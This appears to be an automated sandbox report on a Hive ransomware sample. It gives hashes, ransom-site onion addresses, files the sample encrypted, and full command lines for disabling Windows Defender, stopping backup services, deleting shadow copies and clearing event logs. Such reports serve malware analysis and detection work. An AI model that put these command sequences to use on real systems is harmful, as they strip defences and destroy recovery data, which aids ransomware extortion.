Analysis
- max time kernel: 108s
- max time network: 15s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 10-01-2022 16:44
Static task: static1
Behavioral task: behavioral1
- Sample: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
- Resource: win10-en-20211208
General
- Target: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
- Size: 2.5MB
- MD5: 581d017db261422b60eed963c7823566
- SHA1: 6f35892e195de2c569c415a245a3302056bbfa08
- SHA256: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc
- SHA512: c6142d6478d9a02d0269d3121143a64cb7e0a41d35e7924c9ecf7ced739133d847c4aafb9b851e2a9321a054ba3b9c40f00d8e430ad5d19af271ea28fab214f1
Malware Config
Extracted
- Path: C:\Program Files\7-Zip\a84r_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2108)
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoCs)
  Processes: reg.exe
  IoC: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (reg.exe)
- Clears Windows event logs (1 TTPs)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe (every IoC below was recorded for this process)
  File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png
  File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_GCswj2P1ems0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_2GlJXVeCzZs0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mMPy4xexJtM0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_9B4a1o9JKrM0.pruhs
  File opened for modification: C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui
  File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png
  File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F6lSp6z7mdA0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XZRyG39WxEw0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_LfvYeLAhobw0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5S6VZCzp0KQ0.pruhs
  File opened for modification: C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_udLz2Ffs6AM0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_KmcvzaPPUgU0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_HUto2gVAhC40.pruhs
  File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\settings.html
  File opened for modification: C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeush.dat
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_H4rUMv19Hvk0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5oAdghcmIyw0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_PLFZtvkHOLE0.pruhs
  File opened for modification: C:\Program Files\Java\jre7\lib\plugin.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_xdtulbQkOCM0.pruhs
  File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png
  File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\timeZones.js
  File opened for modification: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\FlickLearningWizard.exe.mui
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_zVveAM2WWOc0.pruhs
  File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui
  File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_FA-qPTqKpX80.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_reDjZvMBP2w0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_R5rV0GIpVrA0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_AXdKsi1SOAA0.pruhs
  File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png
  File opened for modification: C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml
  File created: C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\a84r_HOW_TO_DECRYPT.txt
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XCamJmOveyg0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mbC4VpSzT8s0.pruhs
  File opened for modification: C:\Program Files\Common Files\System\ado\msadox28.tlb
  File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\js\slideShow.js
  File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_ZEXJ8yhoIt00.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0vqYk4EWeCQ0.pruhs
  File opened for modification: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_1xR5fh5p3do0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_tTSiXhhrJOY0.pruhs
  File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png
  File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_yCcdDh1GoI00.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_G3fLfD2VemE0.pruhs
  File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_pBxcQIbp_RE0.pruhs
  File created: C:\Program Files\VideoLAN\VLC\lua\meta\reader\a84r_HOW_TO_DECRYPT.txt
  File opened for modification: C:\Program Files\7-Zip\7zCon.sfx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_BNStNYOut2Q0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_SOE7ahl5eK80.pruhs
  File opened for modification: C:\Program Files\StartDeny.scf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0lnxq57SPe00.pruhs
  File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_C1fi3eE98aM0.pruhs
  File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F4d3zeQw8fw0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\SketchPadTestSchema.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_kiLghOIxbE40.pruhs
  File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_IKyQDQO1aqc0.pruhs
  File opened for modification: C:\Program Files\Java\jre7\lib\zi\America\Juneau.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mdrGcVW4TiQ0.pruhs
  File opened for modification: C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_EZmuCQDH0mI0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_bB3cdm6B4Vc0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN010.XML.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Ray1VIqsaxM0.pruhs
  File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHED98.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Y_5WLahJLGA0.pruhs
  File opened for modification: C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_--tjtl2iRWQ0.pruhs
  File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_M8XHMW8G0LA0.pruhs
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1764)
- Opens file in notepad (likely ransom note) (2 IoCs)
  Processes: NOTEPAD.EXE (PID 2536), notepad.exe (PID 2616)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2140), powershell.exe (PID 2220), 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe (PID 952)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe, wevtutil.exe, wevtutil.exe, wmic.exe, wmic.exe
  Tokens enabled, grouped by process (the report caps the list at 64 entries):
  wevtutil.exe (PID 1356): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 1884): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 304): SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe (PID 980): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe (PID 1308), first pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe (PID 1308), second pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe, net.exe (x8)
  Each source/target pair below was recorded four times (64 entries in total):
  PID 952 (213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe) wrote to memory of PID 584 (net.exe)
  PID 584 (net.exe) wrote to memory of PID 460 (net1.exe)
  PID 952 (sample) wrote to memory of PID 696 (net.exe)
  PID 696 (net.exe) wrote to memory of PID 560 (net1.exe)
  PID 952 (sample) wrote to memory of PID 1480 (net.exe)
  PID 1480 (net.exe) wrote to memory of PID 1364 (net1.exe)
  PID 952 (sample) wrote to memory of PID 520 (net.exe)
  PID 520 (net.exe) wrote to memory of PID 1704 (net1.exe)
  PID 952 (sample) wrote to memory of PID 364 (net.exe)
  PID 364 (net.exe) wrote to memory of PID 1212 (net1.exe)
  PID 952 (sample) wrote to memory of PID 632 (net.exe)
  PID 632 (net.exe) wrote to memory of PID 1956 (net1.exe)
  PID 952 (sample) wrote to memory of PID 1972 (net.exe)
  PID 1972 (net.exe) wrote to memory of PID 1284 (net1.exe)
  PID 952 (sample) wrote to memory of PID 1544 (net.exe)
  PID 1544 (net.exe) wrote to memory of PID 1592 (net1.exe)
Processes (indentation shows the parent/child depth the report marked as 1, 2 and 3)
- PID 952  C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"
  signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - PID 584  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "NetMsmqActivator" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 460  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - PID 696  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "SamSs" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 560  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "SamSs" /y
  - PID 1480  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "SDRSVC" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1364  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - PID 520  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "SstpSvc" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1704  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - PID 364  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "UI0Detect" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1212  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - PID 632  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "VSS" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1956  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "VSS" /y
  - PID 1972  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "wbengine" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1284  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "wbengine" /y
  - PID 1544  C:\Windows\SysWOW64\net.exe
    command line: net.exe stop "WebClient" /y
    signatures: Suspicious use of WriteProcessMemory
    - PID 1592  C:\Windows\SysWOW64\net1.exe
      command line: C:\Windows\system32\net1 stop "WebClient" /y
  - PID 1492  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "NetMsmqActivator" start= disabled
  - PID 1632  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "SamSs" start= disabled
  - PID 1708  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "SDRSVC" start= disabled
  - PID 1712  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "SstpSvc" start= disabled
  - PID 1780  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "UI0Detect" start= disabled
  - PID 1768  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "VSS" start= disabled
  - PID 1612  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "wbengine" start= disabled
  - PID 872  C:\Windows\SysWOW64\sc.exe
    command line: sc.exe config "WebClient" start= disabled
  - PID 608  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1368  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - PID 636  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - PID 1840  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - PID 1552  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - PID 1956  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - PID 1504  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - PID 2004  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - PID 1628  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - PID 1652  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - PID 1496  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - PID 1760  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - PID 856  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - PID 1172  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - PID 580  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 984  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 1640  C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - PID 1084  C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - PID 1616  C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - PID 1564  C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - PID 1200  C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - PID 1716  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - PID 1584  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - PID 576  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - PID 1360  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - PID 1072  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - PID 1944  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - PID 1836  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1752  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1604  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - PID 560  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1212  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    signatures: Modifies security service
  - PID 1540  C:\Windows\SysWOW64\reg.exe
    command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - PID 1764  C:\Windows\SysWOW64\vssadmin.exe
    command line: vssadmin.exe delete shadows /all /quiet
    signatures: Interacts with shadow copies
  - PID 1356  C:\Windows\SysWOW64\wevtutil.exe
    command line: wevtutil.exe cl system
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1884  C:\Windows\SysWOW64\wevtutil.exe
    command line: wevtutil.exe cl security
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 304  C:\Windows\SysWOW64\wevtutil.exe
    command line: wevtutil.exe cl application
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 980  C:\Windows\SysWOW64\Wbem\wmic.exe
    command line: wmic.exe SHADOWCOPY /nointeractive
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1308  C:\Windows\SysWOW64\Wbem\wmic.exe
    command line: wmic.exe shadowcopy delete
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 2084  C:\Windows\SysWOW64\cmd.exe
    command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\a84r_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2616 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"2⤵PID:2624
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a84r_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2536
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5 7ecfb94b8b77105698aa7fff99aac358
SHA1 6d598804804ec9ec2dc1bb70159a22de4dd9e942
